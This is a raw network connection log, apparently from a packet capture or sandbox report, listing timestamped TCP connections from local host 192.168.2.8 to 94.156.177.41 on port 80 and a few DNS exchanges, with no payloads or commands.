Jan 11, 2025 01:42:49.443226099 CET	80	49736	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:50.165489912 CET	80	49736	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:50.165529966 CET	80	49736	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:50.165740013 CET	49736	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:50.165740013 CET	49736	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:50.170649052 CET	80	49736	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:50.328938007 CET	49737	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:50.333930969 CET	80	49737	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:50.334038019 CET	49737	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:50.336088896 CET	49737	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:50.341041088 CET	80	49737	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:50.341120958 CET	49737	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:50.345988035 CET	80	49737	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.033304930 CET	80	49737	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.033375025 CET	80	49737	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.033453941 CET	49737	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:51.033487082 CET	49737	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:51.038336039 CET	80	49737	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.195589066 CET	49738	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:51.200637102 CET	80	49738	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.201498985 CET	49738	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:51.203758001 CET	49738	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:51.208658934 CET	80	49738	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.209450960 CET	49738	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:51.214302063 CET	80	49738	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.929786921 CET	80	49738	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.929903030 CET	80	49738	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:51.929915905 CET	49738	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:51.929949999 CET	49738	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:51.934758902 CET	80	49738	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:52.116049051 CET	49739	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:52.281830072 CET	80	49739	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:52.281960964 CET	49739	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:52.284070015 CET	49739	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:52.288904905 CET	80	49739	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:52.288988113 CET	49739	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:52.293768883 CET	80	49739	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:53.010909081 CET	80	49739	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:53.010937929 CET	80	49739	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:53.011004925 CET	49739	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:53.011099100 CET	49739	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:53.016871929 CET	80	49739	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:53.163500071 CET	49740	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:53.168396950 CET	80	49740	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:53.168462038 CET	49740	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:53.170571089 CET	49740	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:53.175442934 CET	80	49740	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:53.175498962 CET	49740	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:53.180294991 CET	80	49740	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.019459009 CET	80	49740	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.019639015 CET	80	49740	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.019699097 CET	49740	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:54.019923925 CET	49740	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:54.024689913 CET	80	49740	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.167826891 CET	49741	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:54.172652960 CET	80	49741	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.177444935 CET	49741	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:54.179584026 CET	49741	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:54.184366941 CET	80	49741	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.184422016 CET	49741	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:54.189182997 CET	80	49741	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.882802963 CET	80	49741	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.882858038 CET	80	49741	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:54.883071899 CET	49741	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:54.883073092 CET	49741	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:54.888001919 CET	80	49741	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.023750067 CET	49742	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.028594017 CET	80	49742	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.028697968 CET	49742	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.030769110 CET	49742	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.035531044 CET	80	49742	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.035617113 CET	49742	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.040345907 CET	80	49742	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.732820988 CET	80	49742	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.732887030 CET	80	49742	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.733113050 CET	49742	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.740262032 CET	49742	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.745070934 CET	80	49742	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.980542898 CET	49743	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.985560894 CET	80	49743	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.985661030 CET	49743	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.987762928 CET	49743	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.992578983 CET	80	49743	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:55.992625952 CET	49743	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:55.997503996 CET	80	49743	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:56.756866932 CET	80	49743	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:56.756906033 CET	80	49743	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:56.756989956 CET	49743	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:56.757025003 CET	49743	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:56.761823893 CET	80	49743	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:56.896171093 CET	49744	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:56.901243925 CET	80	49744	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:56.905489922 CET	49744	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:56.908021927 CET	49744	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:56.912882090 CET	80	49744	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:56.917464018 CET	49744	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:56.922363997 CET	80	49744	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:57.656831026 CET	80	49744	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:57.656970024 CET	80	49744	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:57.657232046 CET	49744	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:57.657232046 CET	49744	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:57.663712025 CET	80	49744	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:57.799865961 CET	49745	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:57.805701017 CET	80	49745	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:57.805803061 CET	49745	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:57.807913065 CET	49745	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:57.813637972 CET	80	49745	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:57.813692093 CET	49745	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:57.819370985 CET	80	49745	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:58.531346083 CET	80	49745	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:58.531419039 CET	80	49745	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:58.531476021 CET	49745	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:58.539287090 CET	49745	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:58.545320988 CET	80	49745	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:58.974076986 CET	49746	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:58.978991985 CET	80	49746	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:58.979089975 CET	49746	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:58.981187105 CET	49746	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:58.986022949 CET	80	49746	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:58.986100912 CET	49746	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:58.990901947 CET	80	49746	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:59.839251041 CET	80	49746	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:59.839277029 CET	80	49746	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:59.839528084 CET	49746	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:59.839528084 CET	49746	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:59.844497919 CET	80	49746	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:59.990668058 CET	49747	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:59.995841026 CET	80	49747	94.156.177.41	192.168.2.8
Jan 11, 2025 01:42:59.995970964 CET	49747	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:42:59.998092890 CET	49747	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:00.003259897 CET	80	49747	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:00.003340006 CET	49747	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:00.008266926 CET	80	49747	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:00.717897892 CET	80	49747	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:00.717989922 CET	80	49747	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:00.718116999 CET	49747	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:00.718372107 CET	49747	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:00.723181009 CET	80	49747	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:00.863286972 CET	49748	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:00.868251085 CET	80	49748	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:00.868819952 CET	49748	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:00.870846987 CET	49748	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:00.875684023 CET	80	49748	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:00.875735998 CET	49748	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:00.880569935 CET	80	49748	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:01.574404001 CET	80	49748	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:01.574453115 CET	80	49748	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:01.574531078 CET	49748	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:01.574784994 CET	49748	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:01.579715014 CET	80	49748	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:01.933139086 CET	49749	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:01.937987089 CET	80	49749	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:01.938061953 CET	49749	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:01.940114975 CET	49749	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:01.944910049 CET	80	49749	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:01.944953918 CET	49749	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:01.949753046 CET	80	49749	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:02.677066088 CET	80	49749	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:02.677151918 CET	80	49749	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:02.677370071 CET	49749	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:02.677370071 CET	49749	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:02.682219982 CET	80	49749	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:02.814189911 CET	49750	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:02.818980932 CET	80	49750	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:02.819065094 CET	49750	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:02.821182966 CET	49750	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:02.825943947 CET	80	49750	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:02.826097965 CET	49750	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:02.830943108 CET	80	49750	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:02.901206017 CET	51227	53	192.168.2.8	162.159.36.2
Jan 11, 2025 01:43:02.906790018 CET	53	51227	162.159.36.2	192.168.2.8
Jan 11, 2025 01:43:02.906986952 CET	51227	53	192.168.2.8	162.159.36.2
Jan 11, 2025 01:43:02.912552118 CET	53	51227	162.159.36.2	192.168.2.8
Jan 11, 2025 01:43:03.356683016 CET	51227	53	192.168.2.8	162.159.36.2
Jan 11, 2025 01:43:03.361964941 CET	53	51227	162.159.36.2	192.168.2.8
Jan 11, 2025 01:43:03.362024069 CET	51227	53	192.168.2.8	162.159.36.2
Jan 11, 2025 01:43:03.548398972 CET	80	49750	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:03.548513889 CET	80	49750	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:03.548607111 CET	49750	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:03.548790932 CET	49750	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:03.553536892 CET	80	49750	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:03.695565939 CET	51230	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:03.700598001 CET	80	51230	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:03.700670004 CET	51230	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:03.702738047 CET	51230	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:03.707623005 CET	80	51230	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:03.707674026 CET	51230	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:03.712455034 CET	80	51230	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:04.445255995 CET	80	51230	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:04.445307016 CET	80	51230	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:04.445386887 CET	51230	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:04.449129105 CET	51230	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:04.453932047 CET	80	51230	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:04.841957092 CET	51231	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:04.847048998 CET	80	51231	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:04.847116947 CET	51231	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:04.849174023 CET	51231	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:04.853986979 CET	80	51231	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:04.854033947 CET	51231	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:04.858809948 CET	80	51231	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:05.582495928 CET	80	51231	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:05.582655907 CET	80	51231	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:05.582799911 CET	51231	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:05.582946062 CET	51231	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:05.587836027 CET	80	51231	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:05.724229097 CET	51232	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:05.729278088 CET	80	51232	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:05.729363918 CET	51232	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:05.731384993 CET	51232	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:05.736232042 CET	80	51232	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:05.736299038 CET	51232	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:05.741106987 CET	80	51232	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:06.451642036 CET	80	51232	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:06.451725960 CET	80	51232	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:06.451735020 CET	51232	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:06.451767921 CET	51232	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:06.456595898 CET	80	51232	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:06.602236032 CET	51233	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:06.607500076 CET	80	51233	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:06.607594013 CET	51233	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:06.609363079 CET	51233	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:06.614202023 CET	80	51233	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:06.614276886 CET	51233	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:06.619177103 CET	80	51233	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:07.362718105 CET	80	51233	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:07.362807989 CET	80	51233	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:07.362946033 CET	51233	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:07.381634951 CET	51233	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:07.386569977 CET	80	51233	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:07.761413097 CET	51234	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:07.766341925 CET	80	51234	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:07.766431093 CET	51234	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:07.768634081 CET	51234	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:07.773406029 CET	80	51234	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:07.773449898 CET	51234	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:07.778227091 CET	80	51234	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:08.501508951 CET	80	51234	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:08.501548052 CET	80	51234	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:08.501687050 CET	51234	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:08.502063036 CET	51234	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:08.506829977 CET	80	51234	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:08.647931099 CET	51235	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:08.653021097 CET	80	51235	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:08.653142929 CET	51235	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:08.655235052 CET	51235	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:08.660140991 CET	80	51235	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:08.660221100 CET	51235	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:08.665211916 CET	80	51235	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:09.359796047 CET	80	51235	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:09.359833002 CET	80	51235	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:09.359941006 CET	51235	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:09.359992981 CET	51235	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:09.364800930 CET	80	51235	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:09.502629995 CET	51236	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:09.507684946 CET	80	51236	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:09.507761002 CET	51236	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:09.509485960 CET	51236	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:09.514339924 CET	80	51236	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:09.514398098 CET	51236	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:09.519243956 CET	80	51236	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:10.257819891 CET	80	51236	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:10.258035898 CET	80	51236	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:10.258088112 CET	51236	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:10.260468006 CET	51236	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:10.265347958 CET	80	51236	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:10.695051908 CET	51237	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:10.699956894 CET	80	51237	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:10.700038910 CET	51237	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:10.702166080 CET	51237	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:10.707027912 CET	80	51237	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:10.707200050 CET	51237	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:10.712037086 CET	80	51237	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:11.447506905 CET	80	51237	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:11.447577000 CET	80	51237	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:11.447669983 CET	51237	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:11.447751045 CET	51237	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:11.452559948 CET	80	51237	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:11.595354080 CET	51238	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:11.600554943 CET	80	51238	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:11.600661039 CET	51238	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:11.602649927 CET	51238	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:11.607491016 CET	80	51238	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:11.607611895 CET	51238	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:11.612488031 CET	80	51238	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:12.357177019 CET	80	51238	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:12.357232094 CET	80	51238	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:12.357347965 CET	51238	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:12.357434988 CET	51238	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:12.362287998 CET	80	51238	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:12.517105103 CET	51239	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:12.522087097 CET	80	51239	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:12.522169113 CET	51239	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:12.523875952 CET	51239	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:12.528728008 CET	80	51239	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:12.528796911 CET	51239	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:12.533682108 CET	80	51239	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:13.250133038 CET	80	51239	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:13.250163078 CET	80	51239	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:13.250209093 CET	51239	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:13.250245094 CET	51239	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:13.255148888 CET	80	51239	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:13.559947014 CET	51240	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:13.564987898 CET	80	51240	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:13.565058947 CET	51240	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:13.567305088 CET	51240	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:13.572231054 CET	80	51240	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:13.572274923 CET	51240	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:13.577126980 CET	80	51240	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:14.455693960 CET	80	51240	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:14.455751896 CET	80	51240	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:14.455818892 CET	51240	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:14.456114054 CET	51240	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:14.460942984 CET	80	51240	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:14.599380970 CET	51241	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:14.604332924 CET	80	51241	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:14.604439020 CET	51241	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:14.606277943 CET	51241	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:14.611155033 CET	80	51241	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:14.611221075 CET	51241	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:14.616015911 CET	80	51241	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:15.317781925 CET	80	51241	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:15.317843914 CET	80	51241	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:15.317903042 CET	51241	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:15.318176985 CET	51241	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:15.325278997 CET	80	51241	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:15.454896927 CET	51242	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:15.461266994 CET	80	51242	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:15.461354971 CET	51242	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:15.463354111 CET	51242	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:15.469604015 CET	80	51242	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:15.469660997 CET	51242	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:15.475193977 CET	80	51242	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:16.169739962 CET	80	51242	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:16.169823885 CET	80	51242	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:16.169919968 CET	51242	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:16.170073986 CET	51242	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:16.174916983 CET	80	51242	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:16.325350046 CET	51243	80	192.168.2.8	94.156.177.41
Jan 11, 2025 01:43:16.330955982 CET	80	51243	94.156.177.41	192.168.2.8
Jan 11, 2025 01:43:16.331089020 CET	51243	80	192.168.2.8	94.156.177.41
